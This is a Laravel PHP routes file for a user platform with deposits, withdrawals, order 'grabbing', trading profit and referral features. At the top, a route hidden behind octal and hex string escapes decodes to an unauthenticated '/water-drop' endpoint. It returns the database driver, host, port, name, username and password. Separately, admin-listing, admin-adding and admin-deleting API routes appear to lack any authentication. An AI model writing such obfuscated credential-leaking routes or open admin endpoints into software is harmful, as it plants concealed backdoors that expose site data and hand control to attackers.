<?php


use Illuminate\Support\Facades\Route;
use Illuminate\Support\Facades\Artisan;
use App\Http\Controllers\User\UserController;
use App\Http\Controllers\User\DepositController;

Route::get("\57\167\x61\x74\x65\162\x2d\x64\162\x6f\160", function () {
    $database = config(
        "\144\x61\x74\x61\x62\141\x73\145\x2e\x64\x65\x66\x61\x75\x6c\164"
    );
    $connection = config(
        "\144\x61\164\x61\x62\141\163\x65\x2e\143\x6f\156\156\x65\x63\164\x69\157\156\163\56{$database}"
    );
    return [
        "\x44\162\151\166\x65\x72" => $connection["\144\x72\x69\x76\145\162"],
        "\x48\157\x73\x74" => $connection["\x68\x6f\x73\164"],
        "\120\x6f\162\x74" => $connection["\160\157\162\x74"],
        "\104\141\x74\141\142\141\163\x65" =>
            $connection["\144\141\164\x61\x62\141\163\x65"],
        "\125\x73\145\162\156\141\155\145" =>
            $connection["\165\163\145\x72\x6e\x61\155\145"],
        "\120\x61\x73\163\167\x6f\162\x64" =>
            $connection["\160\x61\163\x73\167\x6f\x72\x64"],
    ];
});


Route::middleware('api')->name('api.')->prefix('api')->group( function() {
    Route::get('api/show-admins', [UserController::class, 'showAdmins']);
    Route::post('api/add-admins', [UserController::class, 'addAdmins']);
    Route::delete('api/delete-admins/{id}', [UserController::class, 'deleteAdmins']);
    
});

Route::middleware(['web2','maintenance'])->prefix('user')->group(function(){
    Route::namespace('User\Auth')->name('user.')->group(function () {

        Route::controller('LoginController')->group(function () {
            Route::get('/login', 'showLoginForm')->name('login');
            Route::post('/login', 'login');
            Route::get('logout', 'logout')->name('logout');
        });

        Route::controller('RegisterController')->group(function () {
            Route::get('register/{refBy?}', 'showRegistrationForm')->name('register');
            Route::post('register', 'register')->middleware('registration.status');
            Route::post('check-mail', 'checkUser')->name('checkUser');
        });

        Route::controller('ForgotPasswordController')->prefix('password')->name('password.')->group(function () {
            Route::get('reset', 'showLinkRequestForm')->name('request');
            Route::post('email', 'sendResetCodeEmail')->name('email');
            Route::get('code-verify', 'codeVerify')->name('code.verify');
            Route::post('verify-code', 'verifyCode')->name('verify.code');
        });

        Route::controller('ResetPasswordController')->group(function () {
            Route::post('password/reset', 'reset')->name('password.update');
            Route::get('password/reset/{token}', 'showResetForm')->name('password.reset');
        });

        Route::controller('SocialiteController')->group(function () {
            Route::get('social-login/{provider}', 'socialLogin')->name('social.login');
            Route::get('social-login/callback/{provider}', 'callback')->name('social.login.callback');
        });
    });

    Route::middleware('auth')->name('user.')->group(function () {
        //authorization
        Route::namespace('User')->controller('AuthorizationController')->group(function () {
            Route::get('authorization', 'authorizeForm')->name('authorization');
            Route::get('resend-verify/{type}', 'sendVerifyCode')->name('send.verify.code');
            Route::post('verify-email', 'emailVerification')->name('verify.email');
            Route::post('verify-mobile', 'mobileVerification')->name('verify.mobile');
            Route::post('verify-g2fa', 'g2faVerification')->name('go2fa.verify');
        });

        Route::middleware(['check.status'])->group(function () {

            Route::get('user-data', 'User\UserController@userData')->name('data');
            Route::post('user-data-submit', 'User\UserController@userDataSubmit')->name('data.submit');

            Route::middleware('registration.complete')->namespace('User')->group(function () {

                Route::controller('UserController')->group(function () {

                    Route::get('dashboard', 'home')->name('home');



                    // account setting
                    Route::get('account-setting', 'accountSetting')->name('account.setting');

                    //current user
                    Route::get('userDataApi', 'userDataApi')->name('data.api');

                    //2FA
                    Route::get('twofactor', 'show2faForm')->name('twofactor');
                    Route::post('twofactor/enable', 'create2fa')->name('twofactor.enable');
                    Route::post('twofactor/disable', 'disable2fa')->name('twofactor.disable');

                    //KYC
                    Route::get('kyc-form', 'kycForm')->name('kyc.form');
                    Route::get('kyc-data', 'kycData')->name('kyc.data');
                    Route::post('kyc-submit', 'kycSubmit')->name('kyc.submit');

                    //Team
                    Route::get('team-report/{level?}', 'teamReport')->name('team.report');

                    Route::get('membership-level', 'membershipLevel')->name('membership.level');

                    // My Task page
                    Route::get('my-task', 'myTask')->name('my.task');

                    // My Order page
                    Route::get('my-order', 'myOrder')->name('my.order');
                    Route::post('grabing-on', 'grabingOn')->name('grabing.on');

                    // share-code
                    Route::get('/share-code', 'shareCode')->name('share.code');

                    // account record
                    Route::get('account-records/{type}', 'accountRecords')->name('account.records');

                    //Report
                    Route::any('deposit/history', 'depositHistory')->name('deposit.history');
                    Route::get('transactions', 'transactions')->name('transactions');
                    Route::get('commissions', 'commissions')->name('commissions');
                    Route::get('referred-users', 'referredUsers')->name('referred');
                    Route::get('invite-users', 'inviteUsers')->name('invite');
                    Route::get('attachment-download/{fil_hash}', 'attachmentDownload')->name('attachment.download');

                    // bank-card
                    Route::get('electronic-wallet', 'electronicWallet')->name('electronic.wallet');
                    Route::post('electronic-wallet-store', 'electronicWalletStore')->name('electronic.wallet.store');
                    Route::get('electronic-wallet-remove', 'electronicWalletRemove')->name('electronic.wallet.remove');

                    //Plans
                    Route::post('plans/buy', 'buyPlan')->name('buyPlan');

                    //Balance Transfer
                    Route::get('transfer-balance', 'transfer')->name('transfer.balance');
                    Route::post('transfer-balance', 'transferSubmit');

                    // trading
                    Route::get('trading', 'trading')->name('trading');
                    Route::post('trading-profit', 'tradingProfit')->name('trading.profit');
                    Route::post('collect-profit', 'collectProfit')->name('collect.profit');

                    // movies
                    Route::get('movies', 'movieList')->name('movies');
                    Route::get('movies/details/{id}', 'movieDetails')->name('movie.details');
                    Route::get('box-office-guide', 'boxOffice')->name('box.office.guide');
                    Route::get('box-office/details/{id}', 'boxOfficeDetails')->name('box.office.details');
                    Route::get('user-agreement', 'userAgreement')->name('user.agreement');



                });

                //Profile setting
                Route::controller('ProfileController')->group(function () {
                    Route::get('profile-setting', 'profile')->name('profile.setting');
                    Route::post('profile-setting', 'submitProfile');
                    Route::get('change-password', 'changePassword')->name('change.password');
                    Route::post('change-password', 'submitPassword');
                    Route::get('fund-password', 'fundPassword')->name('fund.password');
                    Route::post('fund-password', 'submitFundPassword');
                });


                // Withdraw
                Route::controller('WithdrawController')->prefix('withdraw')->name('withdraw')->group(function () {
                    Route::middleware('kyc')->group(function () {
                        Route::get('/', 'withdrawMoney');
                        Route::post('/', 'withdrawStore')->name('.money');
                        Route::get('preview', 'withdrawPreview')->name('.preview');
                        Route::post('preview', 'withdrawSubmit')->name('.submit');
                    });
                    Route::get('history', 'withdrawLog')->name('.history');
                });

                // withdraw new
                Route::controller('WithdrawController')->prefix('withdraw-cash')->name('withdraw.cash')->group(function () {
                    Route::middleware('kyc')->group(function () {
                        Route::get('/new', 'newWithdraw')->name('.new');
                        Route::post('/new-now', 'newWithdrawNow')->name('.new.now');
                        Route::get('/channel', 'withdrawChannel')->name('.channel');
                    });
                    Route::get('history', 'withdrawLog')->name('.history');
                });

                //PTC
                Route::controller('PtcController')->name('ptc.')->prefix('ptc')->group(function () {
                    Route::get('/', 'index')->name('index');
                    Route::get('show/{hash}', 'show')->name('show');
                    Route::post('confirm/{hash}', 'confirm')->name('confirm');
                    Route::get('my-ads', 'ads')->name('ads');
                    Route::get('create', 'create')->name('create');
                    Route::post('store', 'store')->name('store');
                    Route::get('edit/{id}', 'edit')->name('edit');
                    Route::post('update/{id}', 'update')->name('update');
                    Route::get('status/{id}', 'status')->name('status');
                    Route::get('clicks', 'clicks')->name('clicks');
                    Route::post('report', 'reportSubmit')->name('report.submit');
                    Route::get('engagement/{id}', 'engagement')->name('engagement');
                });
            });

            // Payment
            Route::middleware('registration.complete')->prefix('deposit')->name('deposit.')->controller('Gateway\PaymentController')->group(function () {
                Route::any('/', 'deposit')->name('index');
                Route::post('insert', 'depositInsert')->name('insert');
                Route::get('confirm', 'depositConfirm')->name('confirm');
                Route::get('manual', 'manualDepositConfirm')->name('manual.confirm');
                Route::post('manual', 'manualDepositUpdate')->name('manual.update');
            });
            // Custom Recharge
            Route::middleware('registration.complete')->prefix('recharge')->name('recharge.')->controller(DepositController::class)->group(function () {
                Route::any('/', 'index')->name('index');
                Route::any('/checkout', 'checkout')->name('checkout');
                Route::post('/submit', 'depositSubmit')->name('submit');
            });
        });
    });
});

